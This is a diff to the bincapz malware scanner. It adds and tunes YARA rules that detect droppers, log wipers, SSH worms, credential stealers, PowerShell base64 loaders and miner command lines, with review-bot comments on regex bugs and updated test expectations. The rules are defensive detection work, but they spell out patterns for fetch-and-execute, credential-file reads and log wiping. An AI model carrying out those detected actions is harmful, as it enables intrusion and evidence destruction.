diff --git a/Makefile b/Makefile
index ccbb1cac3..4522abbb5 100644
--- a/Makefile
+++ b/Makefile
@@ -48,7 +48,7 @@ fix: $(FIXERS)
# END: lint-install ../bincapz
SAMPLES_REPO ?= chainguard-dev/bincapz-samples
-SAMPLES_COMMIT ?= bdcb8c2e9bf557a0abe3e2b0144f437d456299b7
+SAMPLES_COMMIT ?= b112eaf9bc547b2d219dfa775e0eff2874b30b9f
OUT_DIR=out/samples-$(SAMPLES_COMMIT).tmp
out/samples-$(SAMPLES_COMMIT):
mkdir -p out
diff --git a/pkg/action/programkind.go b/pkg/action/programkind.go
index 41761a48a..c0aae904c 100644
--- a/pkg/action/programkind.go
+++ b/pkg/action/programkind.go
@@ -55,6 +55,7 @@ var extMap = map[string]string{
".md": "",
".php": "PHP file",
".pl": "PERL script",
+ ".ps1": "Powershell",
".py": "Python script",
".pyc": "Python script (compiled)",
".rb": "Ruby script",
diff --git a/pkg/action/testdata/scan_archive b/pkg/action/testdata/scan_archive
index c480cc44a..a068288e8 100644
--- a/pkg/action/testdata/scan_archive
+++ b/pkg/action/testdata/scan_archive
@@ -26,6 +26,7 @@ fs/directory/list
fs/directory/remove
fs/fifo/create
fs/file/delete
+fs/file/delete/forcibly
fs/file/read
fs/file/stat
fs/file/write
diff --git a/rules/combo/backdoor/remote_eval.yara b/rules/combo/backdoor/remote_eval.yara
index de89b4266..9bc323975 100644
--- a/rules/combo/backdoor/remote_eval.yara
+++ b/rules/combo/backdoor/remote_eval.yara
@@ -7,9 +7,11 @@ rule remote_eval : critical {
hash_2024_analyze_me_1_0_0_setup = "ca9c74630ed814053220129ee6c43668e66898983d9be5e34b406bbd3ad95b1e"
strings:
$http = "http"
- $eval_open_ruby = /eval\(open[\(\)\"\'\-\w:\/\.]{0,32}/
- $exec_requests = /exec\(requests\.get[\(\)\"\'\-\w:\/\.]{0,32}/
- $eval_requests = /eval\(requests\.get[\(\)\"\'\-\w:\/\.]{0,32}/
+ $eval_open_ruby = /eval\(open[\(\)\"\'\-\w:\/\.]{0,64}/
+ $exec_requests = /exec\(requests\.get[\(\)\"\'\-\w:\/\.]{0,64}/
+ $eval_requests = /eval\(requests\.get[\(\)\"\'\-\w:\/\.]{0,64}/
+ $eval_urllib = /exec\(urllib\.request\.urlopen\([\(\)\"\'\-\w:\/\.]{0,64}\).read\(\)/
+ $exec_urllib = /exec\(urllib\.request\.urlopen\([\(\)\"\'\-\w:\/\.]{0,64}\).read\(\)/
condition:
filesize < 65535 and $http and any of ($e*)
}
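Review bot: `$eval_urllib` and `$exec_urllib` on the two added lines are the same regex, both starting with `exec\(`, so the eval variant of the urllib fetch-and-evaluate pattern is never matched and the first name is misleading. Change the first to `$eval_urllib = /eval\(urllib\.request\.urlopen\([\(\)\"\'\-\w:\/\.]{0,64}\)\.read\(\)/`, and escape the `.` before `read` in both strings, since an unescaped `.` matches any byte there. The rule header and its `meta` block sit outside the hunk.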
diff --git a/rules/combo/dropper/powershell.yara b/rules/combo/dropper/powershell.yara
new file mode 100644
index 000000000..71b21cff2
--- /dev/null
+++ b/rules/combo/dropper/powershell.yara
@@ -0,0 +1,13 @@
+
+rule powershell_base64_dropper : critical {
+ meta:
+ description = "Powershell base64 dropper"
+ strings:
+ $base64 = "FromBase64String"
+ $write = "WriteAllBytes"
+ $io_file = "System.IO.File"
+ $start_proc = "Start-Process"
+ $file_path = "FilePath"
+ condition:
+ filesize < 2KB and all of them
+}
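Review bot: All five strings are case-sensitive ASCII, but PowerShell cmdlets and .NET member names are case-insensitive and `.ps1` files are frequently saved as UTF-16LE, so `start-process`, `[io.file]::WriteAllBytes` or a UTF-16 script would not trigger this `critical` rule. Add `nocase ascii wide` to each string and loosen `$io_file` to the short form, e.g. `$io_file = "IO.File" nocase ascii wide`, which still matches the `System.IO.File` spelling. `filesize < 2KB` is tight for a script that carries its own base64 payload — worth confirming against the sample that motivated the rule.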
diff --git a/rules/combo/dropper/shell.yara b/rules/combo/dropper/shell.yara
index 222d6fce4..e5d151294 100644
--- a/rules/combo/dropper/shell.yara
+++ b/rules/combo/dropper/shell.yara
@@ -102,3 +102,50 @@ rule fetch_chmod_execute : high {
condition:
any of them
}
+
+rule possible_dropper : high {
+ meta:
+ description = "downloads and execute a program"
+ strings:
+ $http = "http://"
+ $https = "https://"
+ $tool_curl_o = /curl [\w\.\- :\"\/]{0,64}-\w{0,2}[oO][\w\- :\"\/]{0,64}/
+ $tool_wget_q = "wget -"
+ $tool_lwp = "lwp-download"
+ $cmd_bash = "bash" fullword
+ $cmd_dot_slash = /\.\/[\.\w]{1,16}/ fullword
+ $cmd_rm = "rm" fullword
+ $cmd_sleep = "sleep" fullword
+ $cmd_echo = "echo" fullword
+ $cmd_chmod = "chmod" fullword
+ condition:
+ filesize < 768 and any of ($http*) and any of ($tool*) and any of ($cmd*)
+}
+
+rule nohup_dropper : critical {
+ meta:
+ description = "downloads and executes a program with nohup"
+ strings:
+ $nohup = "nohup" fullword
+ condition:
+ possible_dropper and $nohup
+}
+
+rule obsessive_dropper : critical {
+ meta:
+ description = "invokes multiple tools to download and execute a program"
+ strings:
+ $http = "http://"
+ $https = "https://"
+ $tool_curl_s = "curl -"
+ $tool_wget_q = "wget -"
+ $tool_lwp = "lwp-download"
+ $cmd_bash = "bash" fullword
+ $cmd_dot_slash = /\.\/[\.\w]{1,16}/ fullword
+ $cmd_rm = "rm" fullword
+ $cmd_sleep = "sleep" fullword
+ $cmd_echo = "echo" fullword
+ $cmd_chmod = "chmod" fullword
+ condition:
+ filesize < 768 and any of ($http*) and 2 of ($tool*) and any of ($cmd*)
+}
\ No newline at end of file
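Review bot: In `possible_dropper`, `$cmd_bash = "bash" fullword` is satisfied by a `#!/bin/bash` shebang and `$cmd_echo`/`$cmd_rm` appear in almost any script, so for files under 768 bytes the `any of ($cmd*)` clause adds little over `$http*` and `$tool*`. Require an argument so the interpreter line does not count, e.g. `$cmd_bash = /bash [\.\/\$\w][\w\.\/\-\$]{0,32}/`. `$tool_wget_q = "wget -"` matches any wget flag, so the `_q` suffix is misleading; `$tool_wget` is more honest. `obsessive_dropper` repeats every `$http*`/`$cmd*` string from `possible_dropper` and, if the looser `curl -` is not essential, could simply be `possible_dropper and 2 of ($tool*)` as `nohup_dropper` does. The file also ends without a trailing newline.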
diff --git a/rules/combo/stealer/linux_server.yara b/rules/combo/stealer/linux_server.yara
index 9890fb7ef..6c8d76b87 100644
--- a/rules/combo/stealer/linux_server.yara
+++ b/rules/combo/stealer/linux_server.yara
@@ -7,8 +7,19 @@ rule linux_server_stealer : high {
hash_2022_services_api = "fe617c77d66f0954d22d6488e4a481b0f8fdc9e3033fa23475dcd24e53561ec7"
strings:
$bash_history = ".bash_history"
- $root_ssh = "/root/.ssh"
- $id_rsa = ".ssh/id_rsa"
+
+ $other_root_ssh = "/root/.ssh"
+ $other_id_rsa = ".ssh/id_rsa"
+ $other_shadow = "etc/shadow"
+
+ $term_crypto = "crypto" fullword
+ $term_echo = "echo" fullword
+ $term_chmod = "chmod" fullword
+ $term_find = "find" fullword
+ $term_scp = "scp" fullword
+ $term_tar = "tar" fullword
+ $term_crontab = "crontab" fullword
+ $term_http = "http" fullword
condition:
- $bash_history and ($root_ssh or $id_rsa)
+ filesize < 10MB and $bash_history and any of ($other*) and any of ($term*)
}
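Review bot: The new `any of ($term*)` clause barely narrows the rule, because `$term_echo`, `$term_find` and `$term_http` (fullword `http` still matches inside `http://`) occur in almost any script or binary that also references `.bash_history`, while `$other_shadow = "etc/shadow"` widens the `$other*` set at the same time. If the intent is to require exfiltration tooling, drop the generic words and ask for two of the rest, e.g. `filesize < 10MB and $bash_history and any of ($other*) and 2 of ($term_scp, $term_tar, $term_crontab, $term_crypto, $term_chmod)`. The rule header and the `hash_*` meta lines are outside the hunk.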
diff --git a/rules/combo/wiper/bash.yara b/rules/combo/wiper/bash.yara
index fd70c2d66..4a96aaccc 100644
--- a/rules/combo/wiper/bash.yara
+++ b/rules/combo/wiper/bash.yara
@@ -8,5 +8,6 @@ rule sleep_rm_sh_pipe : high {
$s_pipe_sh = "| /bin/sh"
$s_rm_rf = "rm -rf"
condition:
- all of them
+ filesize < 16KB and all of them
}
+
diff --git a/rules/combo/wiper/sensitive_logs.yara b/rules/combo/wiper/sensitive_logs.yara
index f5e6dab80..71ef918dc 100644
--- a/rules/combo/wiper/sensitive_logs.yara
+++ b/rules/combo/wiper/sensitive_logs.yara
@@ -17,6 +17,27 @@ rule system_log_references : high {
$btmp = "/var/log/btmp"
$lastlog = "/var/log/lastlog"
$run_log = "/run/log/"
+ $mail_log = "/var/spool/mail/root"
condition:
filesize < 67108864 and 3 of them
}
+
+rule echo_log_wiper : critical {
+ meta:
+ description = "overwrites critical system logs"
+ strings:
+ $var_spool = /echo.{0,4}\> {0,2}\/var\/spool\/mail\/root/
+ $var_log = /echo.{0,4}\> {0,2}\/var\/log\/\w{0,8}/
+ condition:
+ filesize < 16KB and system_log_references and any of them
+}
+
+rule log_remover : critical {
+ meta:
+ description = "overwrites critical system logs"
+ strings:
+ $var_spool = /rm {1,2}-{0,4}\/var\/spool\/mail\/root/
+ $var_log = /rm {1,2}-{0,4}\/var\/log\/\w{0,8}/
+ condition:
+ filesize < 16KB and system_log_references and any of them
+}
\ No newline at end of file
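Review bot: In `log_remover`, `$var_log = /rm {1,2}-{0,4}\/var\/log\/\w{0,8}/` only allows hyphens between `rm` and the path, so the usual `rm -rf /var/log/wtmp` (flag letters and a space after the dash) does not match; `$var_spool` has the same shape. Use the flag pattern the other rules in this diff use, e.g. `$var_log = /rm [\-\w ]{0,6}\/var\/log\/\w{0,8}/` and `$var_spool = /rm [\-\w ]{0,6}\/var\/spool\/mail\/root/`. `log_remover`'s description is a copy of `echo_log_wiper`'s and should read `description = "removes critical system logs"`. The file also loses its trailing newline.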
diff --git a/rules/combo/worm/ssh.yara b/rules/combo/worm/ssh.yara
index de3c9892b..50d1caeed 100644
--- a/rules/combo/worm/ssh.yara
+++ b/rules/combo/worm/ssh.yara
@@ -1,20 +1,34 @@
-rule ssh_snake_worm : high {
+rule ssh_shell_worm : critical {
meta:
- description = "possible SSH worm like SSH-Snake"
- hash_2024_SSH_Snake_Snake_nocomments = "9491fa95f40a69f27ce99229be636030fdc49f315cb9c897db3b602c34a8ceda"
+ description = "SSH worm implemented in shell"
+ hash_2024_SSH_Snake_Snake_nocomments = "9491fa95f40a69f27ce99229be636030fdc49f315cb9c897db3b602c34a8ceda"
hash_2024_SSH_Snake = "b0a2bf48e29c6dfac64f112ac1cb181d184093f582615e54d5fad4c9403408be"
strings:
- $s_dot_ssh = ".ssh"
- $s_authorized_keys = "authorized_keys"
- $h_etc_hosts = "/etc/hosts"
- $h_getent = "getent ahostsv4"
- $u_base64 = "base64"
- $u_uname = "uname"
- $strict_host = "StrictHostKeyChecking"
- $user_known_hosts = "UserKnownHostsFile"
+ $dot_ssh = ".ssh" fullword
+
+ $key_pem = ".pem" fullword
+ $key_rsa = "id_rsa" fullword
+ $key_identity_file = "IdentityFile" fullword
+
+ $hosts_authorized_keys = "authorized_keys"
+ $hosts_etc_hosts = "/etc/hosts"
+ $hosts_getent = "getent ahostsv4"
+ $hosts_ssh_config = /grep.{1,8}HostName.{1,8}\/\.ssh\/config/
+ $hosts_bash_history = /(scp|ssh).{2,64}bash_history/
+ $hosts_known_hosts = "known_hosts"
+
+ $remote_base64 = "base64"
+ $remote_uname = "uname"
+ $remote_curl = "curl -"
+ $remote_wget = "wget"
+ $remote_lwp = "lwp-download"
+
+ $ssh_strict_host = "StrictHostKeyChecking"
+ $ssh_known_hosts = "UserKnownHostsFile"
+ $ssh_connect_timeout = "ConnectTimeout"
condition:
- filesize < 67108864 and $strict_host and $user_known_hosts and all of ($s*) and any of ($h*) and any of ($u*)
+ filesize < 32KB and $dot_ssh and 2 of ($ssh*) and 1 of ($remote*) and 3 of ($hosts*) and any of ($key*)
}
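Review bot: `$key_pem = ".pem" fullword` will not match ordinary file names such as `id.pem` or `server.pem`, because with a leading dot the fullword boundary is tested on the character before the `.`, which is alphanumeric there; only forms like `*.pem` or a quoted `".pem"` satisfy it. If any `.pem` reference should count, use `$key_pem = /\.pem\b/` instead. `$remote_wget = "wget"` has neither `fullword` nor the `-` that `$remote_curl` requires, so it also fires on e.g. `wgetrc`; `$remote_wget = "wget -"` would be consistent with its siblings.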
rule ssh_worm_router : high {
@@ -34,3 +48,5 @@ rule ssh_worm_router : high {
condition:
all of ($s*) and any of ($h*) and any of ($p*)
}
+
+
diff --git a/rules/crypto/mining/tls_dp_port.yara b/rules/crypto/mining/tls_dp_port.yara
new file mode 100644
index 000000000..4f3612ba6
--- /dev/null
+++ b/rules/crypto/mining/tls_dp_port.yara
@@ -0,0 +1,9 @@
+
+rule tls_dp_port : critical {
+ meta:
+ description = "contains cryptominer command-line"
+ strings:
+ $ref = /-p \d+ -tls -dp \d+/
+ condition:
+ any of them
+}
diff --git a/rules/evasion/base64-decode.yara b/rules/evasion/base64-decode.yara
index 28b40e30b..f3b052e3c 100644
--- a/rules/evasion/base64-decode.yara
+++ b/rules/evasion/base64-decode.yara
@@ -42,7 +42,7 @@ rule powershell_decode : medium {
description = "decode base64 strings"
ref = "https://learn.microsoft.com/en-us/dotnet/api/system.convert.frombase64string?view=net-8.0"
strings:
- $ref = "[System.Convert]::FromBase64String" ascii
+ $ref = /System\.Convert[\]: ]+FromBase64String/ ascii
condition:
any of them
}
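Review bot: The widened regex is still `ascii`-only and case-sensitive, which misses UTF-16LE `.ps1` files and lower-cased `[system.convert]::frombase64string` (both legal in PowerShell), and it insists on the `System.` prefix although `[Convert]::FromBase64String` is the more common spelling. Suggest `$ref = /(System\.)?Convert[\]: ]+FromBase64String/ ascii wide nocase`. The rule header is outside the hunk.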
diff --git a/rules/evasion/copy_run_delete.yara b/rules/evasion/copy_run_delete.yara
new file mode 100644
index 000000000..0ba690597
--- /dev/null
+++ b/rules/evasion/copy_run_delete.yara
@@ -0,0 +1,18 @@
+
+rule copy_run_delete : critical {
+ meta:
+ description = "copy executable, run, and delete"
+ strings:
+ $cp = "cp -f"
+ $rm = /rm [\-\w ]{0,4}f[ \$\w\/\.]{0,32}/
+ $null = "/dev/null"
+ $path_tmp = "/tmp"
+ $path_bin = "/bin"
+ $path_var = "/var/"
+ $path_dev_shm = "/dev/shm"
+ $run_quoted = /\"\$[\w\-\/\$]{1,12}\"/ fullword
+ $run_dot_slash = /\.\/[\-\w\$]{1,12}/ fullword
+ condition:
+ filesize < 256 and $cp and $rm and $null and any of ($path*) and any of ($run*)
+}
+
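Review bot: `$path_bin = "/bin"` is satisfied by the `#!/bin/sh` shebang of nearly every script this `filesize < 256` rule can target, so `any of ($path*)` adds no discrimination on scripts. Require a separator before the path so the interpreter line is not counted, e.g. `$path_bin = /[ =\"']\/bin\b/`, which still matches `cd /bin` and `cp -f x /bin/y`; or drop `$path_bin` and rely on `/tmp`, `/var/` and `/dev/shm`. A one-line `description` noting that the rule targets tiny stager scripts (hence the 256-byte cap) would help whoever tunes it later.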
diff --git a/rules/evasion/fake-process-name.yara b/rules/evasion/fake-process-name.yara
index d4cb05619..3eb1941d6 100644
--- a/rules/evasion/fake-process-name.yara
+++ b/rules/evasion/fake-process-name.yara
@@ -24,3 +24,12 @@ rule fake_syslogd : critical {
condition:
any of them
}
+
+rule fake_bash_val : high {
+ meta:
+ description = "Pretends to be a bash process"
+ strings:
+ $bash = "-bash" fullword
+ condition:
+ filesize < 8KB and $bash
+}
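Review bot: `fake_bash_val` is rated `high` on a single five-byte string, and `"-bash" fullword` also matches `--bash` (the preceding `-` is not alphanumeric) and benign checks such as `[ "$0" = "-bash" ]`, so any small script or config under 8KB that mentions the login-shell name will be flagged. Tying it to the mechanism that actually spoofs argv[0] would be safer, e.g. `$bash = /exec -a ["']?-bash/`, or at least `$bash = /[^\-]-bash\b/` to exclude long options. A `description` stating the expected evidence (argv[0] spoofing of an interactive bash) would make triage easier.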
diff --git a/rules/evasion/run_sleep_delete.yara b/rules/evasion/run_sleep_delete.yara
index 7ec38b001..8517ee494 100644
--- a/rules/evasion/run_sleep_delete.yara
+++ b/rules/evasion/run_sleep_delete.yara
@@ -1,5 +1,5 @@
-rule run_and_delete : critical {
+rule run_sleep_delete : critical {
meta:
description = "run executable, sleep, and delete"
hash_2024_Downloads_4ba700b0e86da21d3dcd6b450893901c252bf817bd8792548fc8f389ee5aec78 = "fd3e21b8e2d8acf196cb63a23fc336d7078e72c2c3e168ee7851ea2bef713588"
@@ -14,3 +14,19 @@ rule run_and_delete : critical {
filesize < 64KB and all of them
}
+rule fetch_run_sleep_delete : critical {
+ meta:
+ description = "fetch, run executable, sleep, and delete"
+ strings:
+ $url = /https*:\/\/[\w][\w\.\/\-_\?=\@]{8,64}/
+ $sleep = /sleep \d{1,2}/ fullword
+ $rm = /rm [\-\w ]{0,4}f[ \$\w\/\.]{0,32}/
+ $path_tmp = "/tmp"
+ $path_var = "/var/"
+ $path_dev_shm = "/dev/shm"
+ $run_quoted = /\"\$[\-\w\/\$]{1,12}\"/ fullword
+ $run_dot_slash = /\.\/[\-\w\$]{1,12}/ fullword
+ condition:
+ filesize < 1KB and $url and $sleep and $rm and any of ($path*) and any of ($run*)
+}
+
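Review bot: `$rm = /rm [\-\w ]{0,4}f[ \$\w\/\.]{0,32}/` matches `rm foo` or `rm file.sh` through the first letter of the file name, not only an `-f`/`-rf` flag, so if force is the intended signal the dash must be required: `$rm = /rm [\-\w ]{0,4}-\w{0,3}f[ \$\w\/\.]{0,32}/`; if any `rm` is intended, drop the `f` and say so in the description. `$url` uses `https*`, which also accepts `httpss://`; `https?:` is what is meant. The identical `$rm` pattern appears in the new `copy_run_delete` rule, so both should change together.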
diff --git a/rules/fd/write.yara b/rules/fd/write.yara
index 8fef6c039..cd80a36ab 100644
--- a/rules/fd/write.yara
+++ b/rules/fd/write.yara
@@ -34,3 +34,4 @@ rule py_fd_write {
condition:
any of them
}
+
diff --git a/rules/fs/file-copy.yara b/rules/fs/file-copy.yara
new file mode 100644
index 000000000..4f1823218
--- /dev/null
+++ b/rules/fs/file-copy.yara
@@ -0,0 +1,16 @@
+rule file_copy : medium {
+ meta:
+ description = "copy files using cp"
+ strings:
+ $ref = /cp [-\w ]{0,2}[ \$\w\/\.\-]{0,32}/ fullword
+ condition:
+ any of them
+}
+rule file_copy_force : medium {
+ meta:
+ description = "forcibly copy files using cp -f"
+ strings:
+ $ref = /cp [-\w ]{0,2}f [ \$\w\/\.\-]{0,32}/ fullword
+ condition:
+ any of them
+}
\ No newline at end of file
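Review bot: `file_copy`'s `$ref = /cp [-\w ]{0,2}[ \$\w\/\.\-]{0,32}/ fullword` reduces to `cp ` followed by anything, since both classes may match zero characters, and the expectation updates in this same diff show it firing on clean binaries (libsystemd.so.0, opa, minio). Requiring a source and a destination token makes it a real copy command: `$ref = /cp (-\w{1,3} )?[\$\w\/\.\-]{1,32} [\$\w\/\.\-]{1,32}/ fullword`. The same shape applies to `file_copy_force` with the flag made mandatory. The file ends without a trailing newline.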
diff --git a/rules/fs/file-delete-forcibly.yara b/rules/fs/file-delete-forcibly.yara
index 15db66dbf..629e630af 100644
--- a/rules/fs/file-delete-forcibly.yara
+++ b/rules/fs/file-delete-forcibly.yara
@@ -1,16 +1,16 @@
rule rm_force {
meta:
- description = "Forcibly deletes files using rm"
+ description = "Forcibly deletes files"
strings:
- $ref = /rm [\-\w ]{0,4}-f[ \$\w\/\.]{0,32}/
+ $ref = /rm [\-\w ]{0,4}-[f[ \$\w\/\.]{0,32}/
condition:
$ref
}
rule rm_recursive_force : medium {
meta:
- description = "Forcibly recursively deletes files using rm -R"
+ description = "Forcibly deletes files recursively"
hash_2023_anarchy = "1a6f8d758c6e569109a021c01cc4a5e787a9c876866c0ce5a15f07f266ec8059"
hash_2019_test_compass_test = "6647a368750892a379bb483096910fc3729312e6b2eb6bb964da8062013e300a"
hash_2019_test_sass_test = "fdcb3a53bb071031a5c44d0a7d554a085dceb9ed393a5e3940fda4471698c186"
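Review bot: The new `$ref = /rm [\-\w ]{0,4}-[f[ \$\w\/\.]{0,32}/` has a misplaced bracket: `[f[ \$\w\/\.]` is a single character class that may match zero times, so the pattern degenerates to `rm ` plus optional flags plus `-`, i.e. `rm -r`, `rm -i` or even `perform -x` now counts as a forcible delete. That looks like what drives the many new `fs/file/delete/forcibly` expectations on clean samples in this diff (caddy, chezmoi, minio, sonarlint, the JS fixtures), which should be re-examined rather than accepted. If the intent was to also match clustered flags such as `-rf`/`-Rf`, use `$ref = /rm [\-\w ]{0,4}-\w{0,3}f[ \$\w\/\.]{0,32}/`. The `rm_recursive_force` rule continues past the end of the hunk.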
diff --git a/rules/fs/file-write.yara b/rules/fs/file-write.yara
index f628ce073..f9a5285f2 100644
--- a/rules/fs/file-write.yara
+++ b/rules/fs/file-write.yara
@@ -16,3 +16,14 @@ rule python_file_write {
condition:
any of them
}
+
+
+rule powershell_fs_write {
+ meta:
+ description = "writes content to disk"
+ syscall = "pwrite"
+ strings:
+ $write_val = "System.IO.File]::WriteAllBytes"
+ condition:
+ any of them
+}
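Review bot: `$write_val = "System.IO.File]::WriteAllBytes"` is case-sensitive ASCII and requires the `System.` prefix, so the common `[IO.File]::WriteAllBytes`, lower-cased spellings and UTF-16LE scripts all miss. Suggest `$write_val = /(System\.)?IO\.File\]::WriteAllBytes/ ascii wide nocase`, which keeps the current spelling matching. The `syscall = "pwrite"` meta is an analogy for a .NET call rather than a real syscall mapping — a short `description` saying so would avoid confusion.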
diff --git a/rules/fs/tempdir.yara b/rules/fs/tempdir.yara
index 3162556d3..fa8775294 100644
--- a/rules/fs/tempdir.yara
+++ b/rules/fs/tempdir.yara
@@ -8,6 +8,7 @@ rule tempdir {
$tempdir = "TEMPDIR" fullword
$tmpdir = "TMPDIR" fullword
$cocoa = "NSTemporaryDirectory" fullword
+ $powershell = "GetTempPath" fullword
condition:
any of them
}
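Review bot: `$powershell = "GetTempPath" fullword` is the .NET `System.IO.Path.GetTempPath` name rather than anything PowerShell-specific, and `fullword` excludes the Win32 `GetTempPathA`/`GetTempPathW` imports that native Windows binaries carry. If those are meant to count, use `$win32 = /GetTempPath[AW]?/ fullword`; otherwise renaming the string to `$dotnet` avoids the misleading name. The `rule tempdir` header is outside the hunk.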
diff --git a/rules/net/fetch.yara b/rules/net/fetch.yara
index de13fe42c..1763054ac 100644
--- a/rules/net/fetch.yara
+++ b/rules/net/fetch.yara
@@ -18,7 +18,7 @@ rule curl_download_val : medium {
hash_2023_Downloads_6e35 = "6e35b5670953b6ab15e3eb062b8a594d58936dd93ca382bbb3ebdbf076a1f83b"
hash_2023_Downloads_9929 = "99296550ab836f29ab7b45f18f1a1cb17a102bb81cad83561f615f3a707887d7"
strings:
- $ref = /curl [\w\.\- :\"\/]{0,64}-[oO][\w\- :\"\/]{0,64}/
+ $ref = /curl [\w\.\- :\"\/]{0,64}-\w{0,2}[oO][\w\- :\"\/]{0,64}/
condition:
$ref
}
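Review bot: `-\w{0,2}[oO]` allows only two flag letters before the `o`, so the widely used `curl -fsSLo` / `curl -sSLo` forms still do not match while `-o`, `-so` and `-sSo` do; if clustered flags are the goal, `-\w{0,4}[oO]` covers those without otherwise changing the pattern. The added `\w{0,2}` also lets unrelated options that merely contain an `o` fire (e.g. `--proto` via `-` + `pr` + `o`), which the old literal `-[oO]` did not; a comment on the string noting the trade-off would help. The rule header and `hash_*` meta are outside the hunk.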
diff --git a/rules/process/chdir-unusual.yara b/rules/process/chdir-unusual.yara
index f197e9414..7dd7000a0 100644
--- a/rules/process/chdir-unusual.yara
+++ b/rules/process/chdir-unusual.yara
@@ -8,6 +8,7 @@ rule unusual_cd_val : high {
strings:
$d_mnt = "cd /mnt"
$d_root = "cd /root"
+ $d_bin = "cd /bin"
$d_tmp = "cd /tmp"
$d_usr = /cd \/usr[\/\w\.]{0,16}/
$d_var_log = "cd /var/log"
diff --git a/rules/ref/path/dev-shm.yara b/rules/ref/path/dev-shm.yara
index 49feaafc3..d4b512207 100644
--- a/rules/ref/path/dev-shm.yara
+++ b/rules/ref/path/dev-shm.yara
@@ -1,7 +1,7 @@
rule dev_shm : medium {
meta:
- description = "references /dev/shm (world writeable)"
+ description = "references path within /dev/shm (world writeable)"
strings:
$ref = /\/dev\/shm\/[\%\w\-\/\.]{0,64}/
condition:
diff --git a/rules/ref/site/github_comment_attachment.yara b/rules/ref/site/github_attachment.yara
similarity index 71%
rename from rules/ref/site/github_comment_attachment.yara
rename to rules/ref/site/github_attachment.yara
index 0af5140a0..569d42f95 100644
--- a/rules/ref/site/github_comment_attachment.yara
+++ b/rules/ref/site/github_attachment.yara
@@ -1,8 +1,8 @@
-rule github_comment_attachment : high {
+rule github_attachment : high {
meta:
ref = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/redline-stealer-a-novel-approach/"
- description = "references a GitHub comment attachment, sometimes used to distribute malware"
+ description = "references a GitHub comment attachment"
hash_2024_synthetic_github_attach_fetch = "fd2f0e9cf4288d2be6b22bd0c6e8a5eb99777939c9b2278ecf89f5b8ad536719"
strings:
$ref = /github\.com\/\w{0,32}\/\w{0,32}\/files\/\d{0,16}\/[\w\.\-]{0,64}/
diff --git a/rules/shell/nohup.yara b/rules/shell/nohup.yara
index c988eeb63..5adbe4221 100644
--- a/rules/shell/nohup.yara
+++ b/rules/shell/nohup.yara
@@ -12,10 +12,8 @@ rule nohup_reference_value : medium {
$not_usage = "usage: nohup"
$not_nohup_out = "nohup.out"
$not_pushd = "pushd"
- $bin_sh = "#!/bin/sh"
- $bin_bash = "#!/bin/bash"
condition:
- filesize < 52428800 and any of ($nohup*) and none of ($not*) and not $bin_sh in (0..2) and not $bin_bash in (0..2)
+ filesize < 52428800 and any of ($nohup*) and none of ($not*)
}
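Review bot: Dropping the `$bin_sh`/`$bin_bash` shebang exclusion means every shell script that mentions `nohup` is now rated `medium`, which the updated `github-attach-fetch.sh.simple` expectation in this diff reflects. If that is deliberate, a one-line comment in the rule explaining why scripts are no longer exempt would stop the next person from re-adding the exclusion; if not, keep it — the new `nohup_dropper` combo rule declares its own `$nohup` string and does not depend on this one. The rule header and the `$nohup*` strings are outside the hunk.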
rule elf_nohup : high {
diff --git a/test_data/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple b/test_data/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple
index 872750817..3bef1258c 100644
--- a/test_data/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple
+++ b/test_data/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple
@@ -32,6 +32,7 @@ fs/directory/create
fs/directory/remove
fs/fifo/create
fs/file/delete
+fs/file/delete/forcibly
fs/file/times/set
fs/file/truncate
fs/file/write
diff --git a/test_data/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple b/test_data/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple
index 6b441f68f..945a6372c 100644
--- a/test_data/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple
+++ b/test_data/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple
@@ -31,6 +31,7 @@ fs/directory/create
fs/directory/remove
fs/fifo/create
fs/file/delete
+fs/file/delete/forcibly
fs/file/times/set
fs/file/truncate
fs/file/write
diff --git a/test_data/javascript/clean/highlight.esm.js.simple b/test_data/javascript/clean/highlight.esm.js.simple
index 685ae9b0f..cc64690a1 100644
--- a/test_data/javascript/clean/highlight.esm.js.simple
+++ b/test_data/javascript/clean/highlight.esm.js.simple
@@ -18,6 +18,7 @@ exec/program/background
fs/directory/create
fs/directory/remove
fs/file/capabilities/set
+fs/file/copy
fs/file/delete
fs/file/times/set
fs/link/read
diff --git a/test_data/javascript/clean/highlight.js.simple b/test_data/javascript/clean/highlight.js.simple
index 211572913..16eed8471 100644
--- a/test_data/javascript/clean/highlight.js.simple
+++ b/test_data/javascript/clean/highlight.js.simple
@@ -18,6 +18,7 @@ exec/program/background
fs/directory/create
fs/directory/remove
fs/file/capabilities/set
+fs/file/copy
fs/file/delete
fs/file/times/set
fs/link/read
diff --git a/test_data/javascript/clean/php.js.simple b/test_data/javascript/clean/php.js.simple
index b4c51e376..ce7dc7b98 100644
--- a/test_data/javascript/clean/php.js.simple
+++ b/test_data/javascript/clean/php.js.simple
@@ -14,6 +14,7 @@ fs/directory/create
fs/directory/remove
fs/fifo/create
fs/file/delete
+fs/file/delete/forcibly
fs/file/truncate
fs/link/read
fs/lock/update
diff --git a/test_data/linux/2024.Darkcracks/darkcracks.sh.md b/test_data/linux/2024.Darkcracks/darkcracks.sh.md
index 56f507d54..1c694b22d 100644
--- a/test_data/linux/2024.Darkcracks/darkcracks.sh.md
+++ b/test_data/linux/2024.Darkcracks/darkcracks.sh.md
@@ -3,7 +3,7 @@
| RISK | KEY | DESCRIPTION | EVIDENCE |
|----------|-----------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| CRITICAL | [combo/dropper/shell](https://github.com/chainguard-dev/bincapz/blob/main/rules/combo/dropper/shell.yara#curl_chmod_relative_run_tiny) | change dir, fetch file, make it executable, and run it | [./agr](https://github.com/search?q=.%2Fagr&type=code)
[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
